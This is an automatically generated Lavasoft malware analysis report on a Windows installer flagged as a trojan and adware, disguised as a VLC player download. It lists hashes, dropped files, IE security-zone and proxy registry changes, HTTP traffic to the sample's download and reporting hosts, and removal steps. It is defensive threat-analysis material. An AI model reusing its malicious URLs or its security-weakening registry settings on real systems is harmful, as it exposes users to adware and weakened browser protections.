Installer.Win32.InnoSetup.2.FD, Trojan.Win32.Sasfis.FD, WebToolbar.Win32.InstallCore.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Installer, WebToolbar
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 358948ff6cc660e34b5149632f6618d7
SHA1: 6f4ea55048751b242d6ff67bdd8034984a457661
SHA256: f47c9a59bd7c3e3f0da5d108090f0cd3949b4e99afe387ff675b51d4e9b30941
SSDeep: 24576:YGvm6h1GBy7zQcKwRSr5NOdJSq2YiDDNFH:YGd1ey49wRSidZEDL
Size: 806000 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary: Installer. An installation package.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Installer creates the following process(es):
No processes have been created.
The Installer injects its code into the following process(es):
%original file name%.exe:772
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:772 makes changes in the file system.
The Installer creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\bootstrap_17482.html (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\images\progress-bg2.png (978 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ICReinstall_%original file name%.exe (3879 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is1242154493\834030_stp.EXE.part (1523 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\PL.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Color_Button.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Progress.png (191 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\text-bg.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB953.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\csshover3.htc (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB0A8.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\UA.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\checkbox.css (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Close.png (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB991.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Grey_Button.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\ProgressBar.png (958 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Close_Hover.png (294 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\DE.locale (4 bytes)
%Documents and Settings%\%current user%\Desktop\Continue Media Player Installation.lnk (1 bytes)
%Program Files%\is833625.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Logo.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\FR.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\form.bmp.Mask (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\button.css (417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\progress-bar.css (506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\dat\upd.DAT (108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\IT.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Grey_Button_Hover.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\BG.png (81 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\images\button-bg.png (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\main.css (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\PT.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\RU.locale (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\images\progress-bg.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\ES.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\browse.css (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\EN.locale (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is1242154493\834030_stp.EXE (251679 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\ie6_main.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Color_Button_Hover.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Loader.gif (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB962.log (8 bytes)
The Installer deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\bootstrap_17482.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB991.log (0 bytes)
%Program Files%\is833625.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB953.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB0A8.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB962.log (0 bytes)
Registry activity
The process %original file name%.exe:772 makes changes in the system registry.
The Installer creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "708992537"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC CD 99 73 AF 7C 53 7E 0D E4 71 81 1D D4 FC 0B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Installer modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Installer modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Installer modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Installer deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
8beb1a5bc7ef0e2a2d7eb44b74a2ade7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is1242154493\834030_stp.EXE |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
- Delete the original Installer file.
- Delete or disinfect the following files created/modified by the Installer:
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\bootstrap_17482.html (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\images\progress-bg2.png (978 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ICReinstall_%original file name%.exe (3879 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is1242154493\834030_stp.EXE.part (1523 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\PL.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Color_Button.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Progress.png (191 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\text-bg.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB953.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\csshover3.htc (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB0A8.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\UA.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\checkbox.css (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Close.png (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB991.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Grey_Button.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\ProgressBar.png (958 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Close_Hover.png (294 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\DE.locale (4 bytes)
%Documents and Settings%\%current user%\Desktop\Continue Media Player Installation.lnk (1 bytes)
%Program Files%\is833625.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Logo.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\FR.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\form.bmp.Mask (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\button.css (417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\progress-bar.css (506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\dat\upd.DAT (108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\IT.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Grey_Button_Hover.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\BG.png (81 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\images\button-bg.png (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\main.css (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\PT.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\RU.locale (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\images\progress-bg.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\ES.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\browse.css (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\locale\EN.locale (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\css\ie6_main.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Color_Button_Hover.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ish831656\images\Loader.gif (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB962.log (8 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments: This installation was built with Inno Setup.
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 37732 | 37888 | 4.60255 | ee388f246260667e0b4dd45d4df25909 |
DATA | 45056 | 588 | 1024 | 1.8986 | d5ea23d4ecf110fd2591314cbaa84278 |
BSS | 49152 | 3720 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 53248 | 2384 | 2560 | 3.07115 | bb5485bf968b970e5ea81292af2acdba |
.tls | 57344 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 61440 | 24 | 512 | 0.14174 | 9ba824905bf9c7922b6fc87a38b74366 |
.reloc | 65536 | 2228 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 69632 | 21228 | 21504 | 3.79482 | 4b1229b62c06d1816aab1b896b5cbf23 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 6
Network Activity
URLs
URL | IP |
---|---|
hxxp://os.vlc-plugin.com/CM_DS/?v=3.0&c=1852028036 | 52.19.236.195 |
hxxp://d3qor7nx9zb32s.cloudfront.net/exe/vlc-2.1.0-win32.exe | |
hxxp://os2.vlc-plugin.com/Aff-AD/?v=3.0&c=1852028036 | 54.93.97.68 |
hxxp://static.greatappsdownload.com/exe/vlc-2.1.0-win32.exe | 54.192.95.223 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /exe/vlc-2.1.0-win32.exe HTTP/1.1
Range: bytes=22425600-24278648
Accept: */*
Host: static.greatappsdownload.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 1853049
Connection: keep-alive
Date: Wed, 23 Mar 2016 22:12:04 GMT
x-amz-meta-cb-modifiedtime: Mon, 07 Oct 2013 08:46:48 GMT
Last-Modified: Mon, 07 Oct 2013 08:50:26 GMT
ETag: "8beb1a5bc7ef0e2a2d7eb44b74a2ade7"
Accept-Ranges: bytes
Server: AmazonS3
Age: 12
Content-Range: bytes 22425600-24278648/24278649
X-Cache: Hit from cloudfront
Via: 1.1 ecc0c6e7bd06eacf696003aa79e1e25a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: ufqcGsujrHtUafG1eRcZpsSdnnxBpn3-hAK2zjt8x2d1frnodYRrtQ==
<<< skipped >>>
GET /exe/vlc-2.1.0-win32.exe HTTP/1.1
Range: bytes=0-24278648
Accept: */*
Host: static.greatappsdownload.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 24278649
Connection: keep-alive
Date: Wed, 23 Mar 2016 22:12:03 GMT
x-amz-meta-cb-modifiedtime: Mon, 07 Oct 2013 08:46:48 GMT
Last-Modified: Mon, 07 Oct 2013 08:50:26 GMT
ETag: "8beb1a5bc7ef0e2a2d7eb44b74a2ade7"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 0-24278648/24278649
X-Cache: Miss from cloudfront
Via: 1.1 01aba6a110b5612d129a6b912fa21044.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Wxn6qIbTvJ2BBlY8wnhuwBhk9G_OXQZfaHKmEnqEkc5DPNNGeCqZmw==
<<< skipped >>>
HEAD /exe/vlc-2.1.0-win32.exe HTTP/1.1
Accept: */*
Host: static.greatappsdownload.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 24278649
Connection: keep-alive
Date: Wed, 23 Mar 2016 22:12:03 GMT
x-amz-meta-cb-modifiedtime: Mon, 07 Oct 2013 08:46:48 GMT
Last-Modified: Mon, 07 Oct 2013 08:50:26 GMT
ETag: "8beb1a5bc7ef0e2a2d7eb44b74a2ade7"
Accept-Ranges: bytes
Server: AmazonS3
X-Cache: Miss from cloudfront
Via: 1.1 9c639fa8cc4e8890b24d42b79b84df74.cloudfront.net (CloudFront)
X-Amz-Cf-Id: pdVic9yeSQHsP915rZSVdPR-WTSWAZ5l-5usqcKfzq6n3NrwXKKRKQ==
GET /exe/vlc-2.1.0-win32.exe HTTP/1.1
Range: bytes=12697600-24278648
Accept: */*
Host: static.greatappsdownload.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 11581049
Connection: keep-alive
Date: Wed, 23 Mar 2016 22:12:04 GMT
x-amz-meta-cb-modifiedtime: Mon, 07 Oct 2013 08:46:48 GMT
Last-Modified: Mon, 07 Oct 2013 08:50:26 GMT
ETag: "8beb1a5bc7ef0e2a2d7eb44b74a2ade7"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 12697600-24278648/24278649
X-Cache: Miss from cloudfront
Via: 1.1 22d1c3da7034c9d974fcbde908eb6a50.cloudfront.net (CloudFront)
X-Amz-Cf-Id: UwXyLQLfhvYvIeEUkyAlRJRJTE0TlqULijCZr1P4Cp7bbE8F0Ha8ZQ==
<<< skipped >>>
POST /CM_DS/?v=3.0&c=1852028036 HTTP/1.1
Accept: */*
Host: os.vlc-plugin.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 786
Cache-Control: no-cache
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Wed, 23 Mar 2016 22:12:02 GMT
Server: nginx
Content-Length: 0
Connection: keep-alive
POST /CM_DS/?v=3.0&c=1852028036 HTTP/1.1
Accept: */*
Host: os.vlc-plugin.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 786
Cache-Control: no-cache
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Wed, 23 Mar 2016 22:12:25 GMT
Server: nginx
Content-Length: 0
Connection: keep-alive
POST /Aff-AD/?v=3.0&c=1852028036 HTTP/1.1
Accept: */*
Host: os2.vlc-plugin.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 786
Cache-Control: no-cache
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Wed, 23 Mar 2016 22:12:30 GMT
Server: nginx
Content-Length: 0
Connection: keep-alive
Map
The Installer connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_772:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
$h.CB
$h.CB
kernel32.dll
kernel32.dll
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
File I/O error %d
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
lzmadecompsmall: %s
LzmaDecode failed (%d)
LzmaDecode failed (%d)
shell32.dll
shell32.dll
/SL5="$%x,%d,%d,
/SL5="$%x,%d,%d,
Inno Setup Setup Data (5.5.0)
Inno Setup Setup Data (5.5.0)
Inno Setup Messages (5.5.0)
Inno Setup Messages (5.5.0)
user32.dll
user32.dll
oleaut32.dll
oleaut32.dll
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
GetWindowsDirectoryA
GetWindowsDirectoryA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
ExitWindowsEx
ExitWindowsEx
comctl32.dll
comctl32.dll
.uy}"
.uy}"
name="JR.Inno.Setup"
name="JR.Inno.Setup"
version="1.0.0.0"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
true
true
!'%s' is not a valid integer value('%s' is not a valid floating point value
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
Invalid variant operation"Variant method calls not supported
External exception %x
External exception %x
%original file name%.exe_772_rwx_00900000_000C5000:
%original file name%.exe_772_rwx_009D1000_00170000: